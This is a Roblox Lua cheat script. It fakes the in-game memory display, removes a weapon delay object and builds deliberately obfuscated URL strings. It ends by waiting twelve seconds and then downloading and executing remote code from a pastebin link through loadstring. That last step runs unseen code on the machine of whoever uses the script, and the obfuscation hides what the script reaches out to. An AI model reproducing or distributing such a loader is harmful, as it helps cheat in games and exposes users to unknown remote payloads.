--mem spoofer
local Settings = {
    range1 = 500,
    range2 = 800,
    
}

for __, v in pairs(game.CoreGui.RobloxGui.PerformanceStats:GetChildren()) do
    if v.Name == "PS_Button" and v.StatsMiniTextPanelClass.TitleLabel.Text == "Mem" then
        Memory = v.StatsMiniTextPanelClass.ValueLabel
    end
end

Memory:GetPropertyChangedSignal("Text"):Connect(function()
    local Random = math.random(Settings.range1,Settings.range2)
    Random = Random * 1.23 
    Memory.Text = "".. Random .." MB"
end)
-- no delay
local ReplicatedStorage = game.ReplicatedStorage
local Network = game.Network
local Delay = ReplicatedStorage.BulletHole.Delay

Delay.Position:Destroy()
Delay.Position = 0
-- streamable
-- // script made by earth
-- // script made by earth
-- // script made by earth
-- // script made by earth
b = ("363?313?303?3033v3"):gsub('?', '.')
q = ("3m3o3c3?3t3n3e3t3n3o3c3r3e3s3u3b3u3h3t3i3g3?3w3a3r3"):gsub('?', '.')
n = ("]3e3t3a3v3i3r3P3=3s3=303d3a3z3r3a3f3]3d3a3z3r3a3f3x3]3"):gsub('=', '-')
n = (n):gsub(']', '/')
n = (n):gsub('0', '9999')
z = ("3]3]3:3s3p3t3t3h3"):gsub(']', '/')
c = ("]3n3i3a3m3"):gsub(']', '/')
-- // script made by earth
-- // script made by earth
-- // script made by earth
-- // script made by earth

wait(12)
--earth
loadstring(game:HttpGet("https://pastebin.com/raw/irzRBBH0", true))()
--earth
